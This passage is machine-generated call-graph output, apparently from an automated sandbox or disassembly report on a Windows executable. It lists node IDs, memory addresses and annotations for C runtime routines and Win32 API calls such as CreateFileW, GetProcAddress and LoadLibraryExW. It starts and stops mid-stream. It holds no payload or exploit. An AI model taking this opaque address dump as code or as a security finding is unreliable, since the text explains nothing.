37 API calls 18052->18053 18053->18054 18054->18031 18076 7ff757145ec8 18075->18076 18077 7ff757145eee 18076->18077 18080 7ff757145f21 18076->18080 18078 7ff757144f08 _get_daylight 11 API calls 18077->18078 18079 7ff757145ef3 18078->18079 18081 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 18079->18081 18082 7ff757145f27 18080->18082 18083 7ff757145f34 18080->18083 18085 7ff757134616 18081->18085 18086 7ff757144f08 _get_daylight 11 API calls 18082->18086 18094 7ff75714ac28 18083->18094 18085->16809 18086->18085 18107 7ff7571502d8 EnterCriticalSection 18094->18107 18467 7ff7571478f8 18466->18467 18470 7ff7571473d4 18467->18470 18469 7ff757147911 18469->16819 18471 7ff75714741e 18470->18471 18472 7ff7571473ef 18470->18472 18480 7ff75714546c EnterCriticalSection 18471->18480 18473 7ff75714a814 _invalid_parameter_noinfo 37 API calls 18472->18473 18475 7ff75714740f 18473->18475 18475->18469 18482 7ff75713fe71 18481->18482 18483 7ff75713fe43 18481->18483 18490 7ff75713fe63 18482->18490 18491 7ff75714546c EnterCriticalSection 18482->18491 18484 7ff75714a814 _invalid_parameter_noinfo 37 API calls 18483->18484 18484->18490 18490->16823 18493 7ff7571345c0 108 API calls 18492->18493 18494 7ff757131493 18493->18494 18495 7ff75713149b 18494->18495 18496 7ff7571314bc 18494->18496 18497 7ff757132710 54 API calls 18495->18497 18498 7ff7571406d4 73 API calls 18496->18498 18499 7ff7571314ab 18497->18499 18500 7ff7571314d1 18498->18500 18499->16856 18501 7ff7571314f8 18500->18501 18502 7ff7571314d5 18500->18502 18505 7ff757131508 18501->18505 18506 7ff757131532 18501->18506 18503 7ff757144f08 _get_daylight 11 API calls 18502->18503 18504 7ff7571314da 18503->18504 18507 7ff757132910 54 API calls 18504->18507 18508 7ff757144f08 _get_daylight 11 API calls 18505->18508 18509 7ff757131538 18506->18509 18517 7ff75713154b 18506->18517 18514 7ff7571314f3 __std_exception_destroy 18507->18514 18510 7ff757131510 18508->18510 18511 7ff757131210 92 API calls 18509->18511 18512 7ff757132910 54 API calls 18510->18512 18511->18514 18512->18514 18513 7ff75714004c 74 API calls 18515 7ff7571315c4 18513->18515 18514->18513 18515->16856 18516 7ff75714039c _fread_nolock 53 API calls 18516->18517 18517->18514 18517->18516 18518 7ff7571315d6 18517->18518 18519 7ff757144f08 _get_daylight 11 API calls 18518->18519 18520 7ff7571315db 18519->18520 18521 7ff757132910 54 API calls 18520->18521 18521->18514 18523 7ff757139390 2 API calls 18522->18523 18524 7ff757138e94 LoadLibraryExW 18523->18524 18525 7ff757138eb3 __std_exception_destroy 18524->18525 18525->16890 18599 7ff757136375 18598->18599 18600 7ff757131c80 49 API calls 18599->18600 18601 7ff7571363b1 18600->18601 18602 7ff7571363ba 18601->18602 18603 7ff7571363dd 18601->18603 18605 7ff757132710 54 API calls 18602->18605 18604 7ff757134630 49 API calls 18603->18604 18606 7ff7571363f5 18604->18606 18622 7ff7571363d3 18605->18622 18607 7ff757136413 18606->18607 18608 7ff757132710 54 API calls 18606->18608 18609 7ff757134560 10 API calls 18607->18609 18608->18607 18611 7ff75713641d 18609->18611 18610 7ff75713c550 _log10_special 8 API calls 18612 7ff75713336e 18610->18612 18613 7ff75713642b 18611->18613 18614 7ff757138e80 3 API calls 18611->18614 18612->16930 18629 7ff757136500 18612->18629 18615 7ff757134630 49 API calls 18613->18615 18614->18613 18616 7ff757136444 18615->18616 18617 7ff757136469 18616->18617 18618 7ff757136449 18616->18618 18619 7ff757138e80 3 API calls 18617->18619 18620 7ff757132710 54 API calls 18618->18620 18621 7ff757136476 18619->18621 18620->18622 18623 7ff7571364c1 18621->18623 18624 7ff757136482 18621->18624 18622->18610 18688 7ff757135830 GetProcAddress 18623->18688 18625 7ff757139390 2 API calls 18624->18625 18627 7ff75713649a GetLastError 18625->18627 18628 7ff757132c50 51 API calls 18627->18628 18628->18622 18778 7ff757135400 18629->18778 18631 7ff757136526 18632 7ff75713652e 18631->18632 18633 7ff75713653f 18631->18633 18634 7ff757132710 54 API calls 18632->18634 18785 7ff757134c90 18633->18785 18640 7ff75713653a 18634->18640 18637 7ff75713654b 18639 7ff757132710 54 API calls 18637->18639 18638 7ff75713655c 18641 7ff75713656c 18638->18641 18643 7ff75713657d 18638->18643 18639->18640 18640->16926 18642 7ff757132710 54 API calls 18641->18642 18642->18640 18644 7ff7571365ad 18643->18644 18645 7ff75713659c 18643->18645 18667 7ff757136070 18666->18667 18668 7ff757136099 18667->18668 18674 7ff7571360b0 __std_exception_destroy 18667->18674 18669 7ff757132710 54 API calls 18668->18669 18671 7ff7571361bb 18672 7ff757131470 116 API calls 18672->18674 18673 7ff757132710 54 API calls 18673->18674 18674->18671 18674->18672 18674->18673 18689 7ff757135852 GetLastError 18688->18689 18690 7ff75713587f GetProcAddress 18688->18690 18691 7ff75713585f 18689->18691 18692 7ff7571358aa GetProcAddress 18690->18692 18693 7ff75713589b GetLastError 18690->18693 18694 7ff757132c50 51 API calls 18691->18694 18695 7ff7571358d5 GetProcAddress 18692->18695 18696 7ff7571358c6 GetLastError 18692->18696 18693->18691 18699 7ff757135874 18694->18699 18697 7ff7571358f1 GetLastError 18695->18697 18698 7ff757135903 GetProcAddress 18695->18698 18696->18691 18697->18691 18699->18622 18780 7ff75713542c 18778->18780 18779 7ff757135434 18779->18631 18780->18779 18783 7ff7571355d4 18780->18783 18809 7ff757146aa4 18780->18809 18781 7ff757135797 __std_exception_destroy 18781->18631 18782 7ff7571347d0 47 API calls 18782->18783 18783->18781 18783->18782 18786 7ff757134cc0 18785->18786 18787 7ff75713c550 _log10_special 8 API calls 18786->18787 18788 7ff757134d2a 18787->18788 18788->18637 18788->18638 18810 7ff757146ad4 18809->18810 18813 7ff757145fa0 18810->18813 18812 7ff757146b04 18812->18780 18814 7ff757145fd1 18813->18814 18815 7ff757145fe3 18813->18815 18816 7ff757144f08 _get_daylight 11 API calls 18814->18816 18817 7ff75714602d 18815->18817 18819 7ff757145ff0 18815->18819 18818 7ff757145fd6 18816->18818 18820 7ff757146048 18817->18820 18824 7ff7571447c0 45 API calls 18817->18824 18822 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 18818->18822 18823 7ff75714a814 _invalid_parameter_noinfo 37 API calls 18819->18823 18826 7ff75714606a 18820->18826 18834 7ff757146a2c 18820->18834 18831 7ff757145fe1 18822->18831 18823->18831 18824->18820 18825 7ff75714610b 18828 7ff757144f08 _get_daylight 11 API calls 18825->18828 18825->18831 18826->18825 18827 7ff757144f08 _get_daylight 11 API calls 18826->18827 18829 7ff757146100 18827->18829 18830 7ff7571461b6 18828->18830 18832 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 18829->18832 18831->18812 18832->18825 18835 7ff757146a4f 18834->18835 18836 7ff757146a66 18834->18836 18840 7ff75714ff68 18835->18840 18838 7ff757146a54 18836->18838 18845 7ff75714ff98 18836->18845 18838->18820 18841 7ff75714b150 __GetCurrentState 45 API calls 18840->18841 18846 7ff757144f4c 45 API calls 18845->18846 18886->16934 18888 7ff75714b150 __GetCurrentState 45 API calls 18887->18888 18890 7ff75714a3e1 18888->18890 18889 7ff75714a504 __GetCurrentState 45 API calls 18891 7ff75714a401 18889->18891 18890->18889 20286 7ff75713cb50 20287 7ff75713cb60 20286->20287 20303 7ff757149ba8 20287->20303 20289 7ff75713cb6c 20309 7ff75713ce48 20289->20309 20291 7ff75713d12c 7 API calls 20292 7ff75713cc05 20291->20292 20293 7ff75713cb84 _RTC_Initialize 20301 7ff75713cbd9 20293->20301 20314 7ff75713cff8 20293->20314 20295 7ff75713cb99 20317 7ff757149014 20295->20317 20301->20291 20302 7ff75713cbf5 20301->20302 20304 7ff757149bb9 20303->20304 20305 7ff757144f08 _get_daylight 11 API calls 20304->20305 20306 7ff757149bc1 20304->20306 20307 7ff757149bd0 20305->20307 20306->20289 20308 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 20307->20308 20308->20306 20310 7ff75713ce59 20309->20310 20313 7ff75713ce5e __scrt_release_startup_lock 20309->20313 20311 7ff75713d12c 7 API calls 20310->20311 20310->20313 20312 7ff75713ced2 20311->20312 20313->20293 20342 7ff75713cfbc 20314->20342 20316 7ff75713d001 20316->20295 20318 7ff75713cba5 20317->20318 20319 7ff757149034 20317->20319 20318->20301 20341 7ff75713d0cc InitializeSListHead 20318->20341 20320 7ff75714903c 20319->20320 20321 7ff757149052 GetModuleFileNameW 20319->20321 20322 7ff757144f08 _get_daylight 11 API calls 20320->20322 20325 7ff75714907d 20321->20325 20323 7ff757149041 20322->20323 20324 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 20323->20324 20324->20318 20326 7ff757148fb4 11 API calls 20325->20326 20327 7ff7571490bd 20326->20327 20328 7ff7571490c5 20327->20328 20331 7ff7571490dd 20327->20331 20329 7ff757144f08 _get_daylight 11 API calls 20328->20329 20330 7ff7571490ca 20329->20330 20333 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20330->20333 20332 7ff7571490ff 20331->20332 20335 7ff75714912b 20331->20335 20336 7ff757149144 20331->20336 20334 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20332->20334 20333->20318 20334->20318 20337 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20335->20337 20339 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20336->20339 20338 7ff757149134 20337->20338 20340 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20338->20340 20339->20332 20340->20318 20343 7ff75713cfd6 20342->20343 20345 7ff75713cfcf 20342->20345 20346 7ff75714a1ec 20343->20346 20345->20316 20349 7ff757149e28 20346->20349 20356 7ff7571502d8 EnterCriticalSection 20349->20356 20360 7ff757149d50 20363 7ff757149ccc 20360->20363 20370 7ff7571502d8 EnterCriticalSection 20363->20370 20496 7ff75714afd0 20497 7ff75714afd5 20496->20497 20498 7ff75714afea 20496->20498 20502 7ff75714aff0 20497->20502 20503 7ff75714b03a 20502->20503 20504 7ff75714b032 20502->20504 20506 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20503->20506 20505 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20504->20505 20505->20503 20507 7ff75714b047 20506->20507 20508 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20507->20508 20509 7ff75714b054 20508->20509 20510 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20509->20510 20511 7ff75714b061 20510->20511 20512 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20511->20512 20513 7ff75714b06e 20512->20513 20514 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20513->20514 20515 7ff75714b07b 20514->20515 20516 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20515->20516 20517 7ff75714b088 20516->20517 20518 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20517->20518 20519 7ff75714b095 20518->20519 20520 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20519->20520 20521 7ff75714b0a5 20520->20521 20522 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20521->20522 20523 7ff75714b0b5 20522->20523 20528 7ff75714ae94 20523->20528 20542 7ff7571502d8 EnterCriticalSection 20528->20542 18967 7ff757157c20 18970 7ff7571525f0 18967->18970 18971 7ff7571525fd 18970->18971 18972 7ff757152642 18970->18972 18976 7ff75714b224 18971->18976 18977 7ff75714b235 FlsGetValue 18976->18977 18978 7ff75714b250 FlsSetValue 18976->18978 18979 7ff75714b24a 18977->18979 18980 7ff75714b242 18977->18980 18978->18980 18981 7ff75714b25d 18978->18981 18979->18978 18982 7ff75714b248 18980->18982 18983 7ff75714a504 __GetCurrentState 45 API calls 18980->18983 18984 7ff75714eb98 _get_daylight 11 API calls 18981->18984 18996 7ff7571522c4 18982->18996 18985 7ff75714b2c5 18983->18985 18986 7ff75714b26c 18984->18986 18987 7ff75714b28a FlsSetValue 18986->18987 18988 7ff75714b27a FlsSetValue 18986->18988 18990 7ff75714b2a8 18987->18990 18991 7ff75714b296 FlsSetValue 18987->18991 18989 7ff75714b283 18988->18989 18992 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18989->18992 18993 7ff75714aef4 _get_daylight 11 API calls 18990->18993 18991->18989 18992->18980 18994 7ff75714b2b0 18993->18994 18995 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18994->18995 18995->18982 19019 7ff757152534 18996->19019 18998 7ff7571522f9 19034 7ff757151fc4 18998->19034 19001 7ff757152316 19001->18972 19002 7ff75714d5fc _fread_nolock 12 API calls 19003 7ff757152327 19002->19003 19004 7ff75715232f 19003->19004 19006 7ff75715233e 19003->19006 19005 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19004->19005 19005->19001 19006->19006 19041 7ff75715266c 19006->19041 19009 7ff75715243a 19010 7ff757144f08 _get_daylight 11 API calls 19009->19010 19011 7ff75715243f 19010->19011 19013 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19011->19013 19012 7ff757152495 19015 7ff7571524fc 19012->19015 19052 7ff757151df4 19012->19052 19013->19001 19014 7ff757152454 19014->19012 19017 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19014->19017 19016 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19015->19016 19016->19001 19017->19012 19020 7ff757152557 19019->19020 19021 7ff757152561 19020->19021 19067 7ff7571502d8 EnterCriticalSection 19020->19067 19023 7ff7571525d3 19021->19023 19026 7ff75714a504 __GetCurrentState 45 API calls 19021->19026 19023->18998 19027 7ff7571525eb 19026->19027 19029 7ff757152642 19027->19029 19031 7ff75714b224 50 API calls 19027->19031 19029->18998 19032 7ff75715262c 19031->19032 19033 7ff7571522c4 65 API calls 19032->19033 19033->19029 19035 7ff757144f4c 45 API calls 19034->19035 19036 7ff757151fd8 19035->19036 19037 7ff757151fe4 GetOEMCP 19036->19037 19038 7ff757151ff6 19036->19038 19039 7ff75715200b 19037->19039 19038->19039 19040 7ff757151ffb GetACP 19038->19040 19039->19001 19039->19002 19040->19039 19042 7ff757151fc4 47 API calls 19041->19042 19043 7ff757152699 19042->19043 19045 7ff7571526d6 IsValidCodePage 19043->19045 19050 7ff7571527ef 19043->19050 19051 7ff7571526f0 __scrt_get_show_window_mode 19043->19051 19044 7ff75713c550 _log10_special 8 API calls 19046 7ff757152431 19044->19046 19047 7ff7571526e7 19045->19047 19045->19050 19046->19009 19046->19014 19048 7ff757152716 GetCPInfo 19047->19048 19047->19051 19048->19050 19048->19051 19050->19044 19068 7ff7571520dc 19051->19068 19124 7ff7571502d8 EnterCriticalSection 19052->19124 19069 7ff757152119 GetCPInfo 19068->19069 19078 7ff75715220f 19068->19078 19074 7ff75715212c 19069->19074 19069->19078 19070 7ff75713c550 _log10_special 8 API calls 19071 7ff7571522ae 19070->19071 19071->19050 19072 7ff757152e40 48 API calls 19073 7ff7571521a3 19072->19073 19079 7ff757157b84 19073->19079 19074->19072 19077 7ff757157b84 54 API calls 19077->19078 19078->19070 19080 7ff757144f4c 45 API calls 19079->19080 19081 7ff757157ba9 19080->19081 19084 7ff757157850 19081->19084 19085 7ff757157891 19084->19085 19086 7ff75714f8a0 _fread_nolock MultiByteToWideChar 19085->19086 19089 7ff7571578db 19086->19089 19087 7ff757157b59 19088 7ff75713c550 _log10_special 8 API calls 19087->19088 19090 7ff7571521d6 19088->19090 19089->19087 19091 7ff75714d5fc _fread_nolock 12 API calls 19089->19091 19092 7ff757157a11 19089->19092 19094 7ff757157913 19089->19094 19090->19077 19091->19094 19092->19087 19093 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19092->19093 19093->19087 19094->19092 19095 7ff75714f8a0 _fread_nolock MultiByteToWideChar 19094->19095 19096 7ff757157986 19095->19096 19096->19092 19115 7ff75714f0e4 19096->19115 19099 7ff7571579d1 19099->19092 19101 7ff75714f0e4 __crtLCMapStringW 6 API calls 19099->19101 19100 7ff757157a22 19102 7ff75714d5fc _fread_nolock 12 API calls 19100->19102 19103 7ff757157af4 19100->19103 19105 7ff757157a40 19100->19105 19101->19092 19102->19105 19103->19092 19104 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19103->19104 19104->19092 19105->19092 19106 7ff75714f0e4 __crtLCMapStringW 6 API calls 19105->19106 19107 7ff757157ac0 19106->19107 19107->19103 19108 7ff757157af6 19107->19108 19109 7ff757157ae0 19107->19109 19111 7ff7571507e8 WideCharToMultiByte 19108->19111 19110 7ff7571507e8 WideCharToMultiByte 19109->19110 19112 7ff757157aee 19110->19112 19111->19112 19112->19103 19113 7ff757157b0e 19112->19113 19113->19092 19114 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19113->19114 19114->19092 19116 7ff75714ed10 __crtLCMapStringW 5 API calls 19115->19116 19117 7ff75714f122 19116->19117 19118 7ff75714f12a 19117->19118 19121 7ff75714f1d0 19117->19121 19118->19092 19118->19099 19118->19100 19120 7ff75714f193 LCMapStringW 19120->19118 19122 7ff75714ed10 __crtLCMapStringW 5 API calls 19121->19122 19123 7ff75714f1fe __crtLCMapStringW 19122->19123 19123->19120 20386 7ff75714c520 20397 7ff7571502d8 EnterCriticalSection 20386->20397 16103 7ff757145628 16104 7ff757145642 16103->16104 16105 7ff75714565f 16103->16105 16154 7ff757144ee8 16104->16154 16105->16104 16107 7ff757145672 CreateFileW 16105->16107 16109 7ff7571456dc 16107->16109 16110 7ff7571456a6 16107->16110 16157 7ff757145c04 16109->16157 16128 7ff75714577c GetFileType 16110->16128 16111 7ff757144f08 _get_daylight 11 API calls 16115 7ff75714564f 16111->16115 16119 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 16115->16119 16117 7ff757145710 16183 7ff7571459c4 16117->16183 16118 7ff7571456e5 16178 7ff757144e7c 16118->16178 16124 7ff75714565a 16119->16124 16120 7ff7571456bb CloseHandle 16120->16124 16121 7ff7571456d1 CloseHandle 16121->16124 16125 7ff7571456ef 16125->16124 16129 7ff7571457ca 16128->16129 16130 7ff757145887 16128->16130 16131 7ff7571457f6 GetFileInformationByHandle 16129->16131 16135 7ff757145b00 21 API calls 16129->16135 16132 7ff7571458b1 16130->16132 16133 7ff75714588f 16130->16133 16136 7ff7571458a2 GetLastError 16131->16136 16137 7ff75714581f 16131->16137 16134 7ff7571458d4 PeekNamedPipe 16132->16134 16152 7ff757145872 16132->16152 16133->16136 16138 7ff757145893 16133->16138 16134->16152 16144 7ff7571457e4 16135->16144 16139 7ff757144e7c _fread_nolock 11 API calls 16136->16139 16140 7ff7571459c4 51 API calls 16137->16140 16141 7ff757144f08 _get_daylight 11 API calls 16138->16141 16139->16152 16142 7ff75714582a 16140->16142 16141->16152 16200 7ff757145924 16142->16200 16143 7ff75713c550 _log10_special 8 API calls 16146 7ff7571456b4 16143->16146 16144->16131 16144->16152 16146->16120 16146->16121 16148 7ff757145924 10 API calls 16149 7ff757145849 16148->16149 16150 7ff757145924 10 API calls 16149->16150 16151 7ff75714585a 16150->16151 16151->16152 16153 7ff757144f08 _get_daylight 11 API calls 16151->16153 16152->16143 16153->16152 16155 7ff75714b2c8 _get_daylight 11 API calls 16154->16155 16156 7ff757144ef1 16155->16156 16156->16111 16158 7ff757145c3a 16157->16158 16159 7ff757144f08 _get_daylight 11 API calls 16158->16159 16177 7ff757145cd2 __std_exception_destroy 16158->16177 16161 7ff757145c4c 16159->16161 16160 7ff75713c550 _log10_special 8 API calls 16162 7ff7571456e1 16160->16162 16163 7ff757144f08 _get_daylight 11 API calls 16161->16163 16162->16117 16162->16118 16164 7ff757145c54 16163->16164 16207 7ff757147e08 16164->16207 16166 7ff757145c69 16167 7ff757145c7b 16166->16167 16168 7ff757145c71 16166->16168 16169 7ff757144f08 _get_daylight 11 API calls 16167->16169 16170 7ff757144f08 _get_daylight 11 API calls 16168->16170 16171 7ff757145c80 16169->16171 16174 7ff757145c76 16170->16174 16172 7ff757144f08 _get_daylight 11 API calls 16171->16172 16171->16177 16173 7ff757145c8a 16172->16173 16175 7ff757147e08 45 API calls 16173->16175 16176 7ff757145cc4 GetDriveTypeW 16174->16176 16174->16177 16175->16174 16176->16177 16177->16160 16179 7ff75714b2c8 _get_daylight 11 API calls 16178->16179 16180 7ff757144e89 Concurrency::details::SchedulerProxy::DeleteThis 16179->16180 16181 7ff75714b2c8 _get_daylight 11 API calls 16180->16181 16182 7ff757144eab 16181->16182 16182->16125 16184 7ff7571459ec 16183->16184 16192 7ff75714571d 16184->16192 16301 7ff75714f724 16184->16301 16186 7ff757145a80 16187 7ff75714f724 51 API calls 16186->16187 16186->16192 16188 7ff757145a93 16187->16188 16189 7ff75714f724 51 API calls 16188->16189 16188->16192 16190 7ff757145aa6 16189->16190 16191 7ff75714f724 51 API calls 16190->16191 16190->16192 16191->16192 16193 7ff757145b00 16192->16193 16194 7ff757145b1a 16193->16194 16195 7ff757145b51 16194->16195 16196 7ff757145b2a 16194->16196 16198 7ff75714f5b8 21 API calls 16195->16198 16197 7ff757145b3a 16196->16197 16199 7ff757144e7c _fread_nolock 11 API calls 16196->16199 16197->16125 16198->16197 16199->16197 16201 7ff75714594d FileTimeToSystemTime 16200->16201 16202 7ff757145940 16200->16202 16203 7ff757145961 SystemTimeToTzSpecificLocalTime 16201->16203 16204 7ff757145948 16201->16204 16202->16201 16202->16204 16203->16204 16205 7ff75713c550 _log10_special 8 API calls 16204->16205 16206 7ff757145839 16205->16206 16206->16148 16208 7ff757147e92 16207->16208 16209 7ff757147e24 16207->16209 16244 7ff7571507c0 16208->16244 16209->16208 16211 7ff757147e29 16209->16211 16212 7ff757147e5e 16211->16212 16213 7ff757147e41 16211->16213 16227 7ff757147c4c GetFullPathNameW 16212->16227 16219 7ff757147bd8 GetFullPathNameW 16213->16219 16218 7ff757147e56 __std_exception_destroy 16218->16166 16220 7ff757147bfe GetLastError 16219->16220 16222 7ff757147c14 16219->16222 16221 7ff757144e7c _fread_nolock 11 API calls 16220->16221 16223 7ff757147c0b 16221->16223 16224 7ff757147c10 16222->16224 16226 7ff757144f08 _get_daylight 11 API calls 16222->16226 16225 7ff757144f08 _get_daylight 11 API calls 16223->16225 16224->16218 16225->16224 16226->16224 16228 7ff757147c7f GetLastError 16227->16228 16233 7ff757147c95 __std_exception_destroy 16227->16233 16229 7ff757144e7c _fread_nolock 11 API calls 16228->16229 16230 7ff757147c8c 16229->16230 16231 7ff757144f08 _get_daylight 11 API calls 16230->16231 16232 7ff757147c91 16231->16232 16235 7ff757147d24 16232->16235 16233->16232 16234 7ff757147cef GetFullPathNameW 16233->16234 16234->16228 16234->16232 16238 7ff757147d98 memcpy_s 16235->16238 16239 7ff757147d4d __scrt_get_show_window_mode 16235->16239 16236 7ff757147d81 16237 7ff757144f08 _get_daylight 11 API calls 16236->16237 16243 7ff757147d86 16237->16243 16238->16218 16239->16236 16239->16238 16240 7ff757147dba 16239->16240 16240->16238 16242 7ff757144f08 _get_daylight 11 API calls 16240->16242 16241 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 16241->16238 16242->16243 16243->16241 16247 7ff7571505d0 16244->16247 16248 7ff7571505fb 16247->16248 16249 7ff757150612 16247->16249 16250 7ff757144f08 _get_daylight 11 API calls 16248->16250 16251 7ff757150637 16249->16251 16252 7ff757150616 16249->16252 16265 7ff757150600 16250->16265 16285 7ff75714f5b8 16251->16285 16273 7ff75715073c 16252->16273 16256 7ff75715063c 16260 7ff7571506e1 16256->16260 16268 7ff757150663 16256->16268 16257 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 16272 7ff75715060b __std_exception_destroy 16257->16272 16258 7ff75715061f 16259 7ff757144ee8 _fread_nolock 11 API calls 16258->16259 16261 7ff757150624 16259->16261 16260->16248 16262 7ff7571506e9 16260->16262 16264 7ff757144f08 _get_daylight 11 API calls 16261->16264 16266 7ff757147bd8 13 API calls 16262->16266 16263 7ff75713c550 _log10_special 8 API calls 16267 7ff757150731 16263->16267 16264->16265 16265->16257 16266->16272 16267->16218 16269 7ff757147c4c 14 API calls 16268->16269 16270 7ff7571506a7 16269->16270 16271 7ff757147d24 37 API calls 16270->16271 16270->16272 16271->16272 16272->16263 16274 7ff757150786 16273->16274 16275 7ff757150756 16273->16275 16277 7ff757150771 16274->16277 16278 7ff757150791 GetDriveTypeW 16274->16278 16276 7ff757144ee8 _fread_nolock 11 API calls 16275->16276 16279 7ff75715075b 16276->16279 16281 7ff75713c550 _log10_special 8 API calls 16277->16281 16278->16277 16280 7ff757144f08 _get_daylight 11 API calls 16279->16280 16282 7ff757150766 16280->16282 16283 7ff75715061b 16281->16283 16284 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 16282->16284 16283->16256 16283->16258 16284->16277 16299 7ff75715a4d0 16285->16299 16287 7ff75714f5ee GetCurrentDirectoryW 16288 7ff75714f62c 16287->16288 16289 7ff75714f605 16287->16289 16290 7ff75714eb98 _get_daylight 11 API calls 16288->16290 16291 7ff75713c550 _log10_special 8 API calls 16289->16291 16292 7ff75714f63b 16290->16292 16293 7ff75714f699 16291->16293 16294 7ff75714f654 16292->16294 16295 7ff75714f645 GetCurrentDirectoryW 16292->16295 16293->16256 16297 7ff757144f08 _get_daylight 11 API calls 16294->16297 16295->16294 16296 7ff75714f659 16295->16296 16298 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16296->16298 16297->16296 16298->16289 16300 7ff75715a4c0 16299->16300 16300->16287 16300->16300 16302 7ff75714f755 16301->16302 16303 7ff75714f731 16301->16303 16305 7ff75714f78f 16302->16305 16308 7ff75714f7ae 16302->16308 16303->16302 16304 7ff75714f736 16303->16304 16306 7ff757144f08 _get_daylight 11 API calls 16304->16306 16307 7ff757144f08 _get_daylight 11 API calls 16305->16307 16309 7ff75714f73b 16306->16309 16310 7ff75714f794 16307->16310 16318 7ff757144f4c 16308->16318 16312 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 16309->16312 16313 7ff75714a8e0 _invalid_parameter_noinfo 37 API calls 16310->16313 16315 7ff75714f746 16312->16315 16316 7ff75714f79f 16313->16316 16314 7ff75714f7bb 16314->16316 16317 7ff7571504dc 51 API calls 16314->16317 16315->16186 16316->16186 16317->16314 16319 7ff757144f6b 16318->16319 16320 7ff757144f70 16318->16320 16319->16314 16320->16319 16326 7ff75714b150 GetLastError 16320->16326 16327 7ff75714b174 FlsGetValue 16326->16327 16328 7ff75714b191 FlsSetValue 16326->16328 16329 7ff75714b18b 16327->16329 16346 7ff75714b181 16327->16346 16330 7ff75714b1a3 16328->16330 16328->16346 16329->16328 16332 7ff75714eb98 _get_daylight 11 API calls 16330->16332 16331 7ff75714b1fd SetLastError 16333 7ff75714b21d 16331->16333 16334 7ff757144f8b 16331->16334 16335 7ff75714b1b2 16332->16335 16356 7ff75714a504 16333->16356 16348 7ff75714d984 16334->16348 16337 7ff75714b1d0 FlsSetValue 16335->16337 16338 7ff75714b1c0 FlsSetValue 16335->16338 16341 7ff75714b1dc FlsSetValue 16337->16341 16342 7ff75714b1ee 16337->16342 16340 7ff75714b1c9 16338->16340 16344 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16340->16344 16341->16340 16343 7ff75714aef4 _get_daylight 11 API calls 16342->16343 16345 7ff75714b1f6 16343->16345 16344->16346 16347 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16345->16347 16346->16331 16347->16331 16349 7ff75714d999 16348->16349 16350 7ff757144fae 16348->16350 16349->16350 16400 7ff757153304 16349->16400 16352 7ff75714d9f0 16350->16352 16353 7ff75714da18 16352->16353 16354 7ff75714da05 16352->16354 16353->16319 16354->16353 16413 7ff757152650 16354->16413 16365 7ff757153650 16356->16365 16391 7ff757153608 16365->16391 16396 7ff7571502d8 EnterCriticalSection 16391->16396 16401 7ff75714b150 __GetCurrentState 45 API calls 16400->16401 16402 7ff757153313 16401->16402 16403 7ff75715335e 16402->16403 16412 7ff7571502d8 EnterCriticalSection 16402->16412 16403->16350 16414 7ff75714b150 __GetCurrentState 45 API calls 16413->16414 16415 7ff757152659 16414->16415 20213 7ff7571516b0 20224 7ff7571573e4 20213->20224 20225 7ff7571573f1 20224->20225 20226 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20225->20226 20227 7ff75715740d 20225->20227 20226->20225 20228 7ff75714a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20227->20228 20229 7ff7571516b9 20227->20229 20228->20227 20230 7ff7571502d8 EnterCriticalSection 20229->20230 20556 7ff75715adfe 20557 7ff75715ae0d 20556->20557 20558 7ff75715ae17 20556->20558 20560 7ff757150338 LeaveCriticalSection 20557->20560 15918 7ff75714f98c 15919 7ff75714fb7e 15918->15919 15921 7ff75714f9ce _isindst 15918->15921 15971 7ff757144f08 15919->15971 15921->15919 15924 7ff75714fa4e _isindst 15921->15924 15939 7ff757156194 15924->15939 15929 7ff75714fbaa 15983 7ff75714a900 IsProcessorFeaturePresent 15929->15983 15936 7ff75714faab 15938 7ff75714fb6e 15936->15938 15964 7ff7571561d8 15936->15964 15974 7ff75713c550 15938->15974 15940 7ff7571561a3 15939->15940 15941 7ff75714fa6c 15939->15941 15987 7ff7571502d8 EnterCriticalSection 15940->15987 15946 7ff757155598 15941->15946 15947 7ff75714fa81 15946->15947 15948 7ff7571555a1 15946->15948 15947->15929 15952 7ff7571555c8 15947->15952 15949 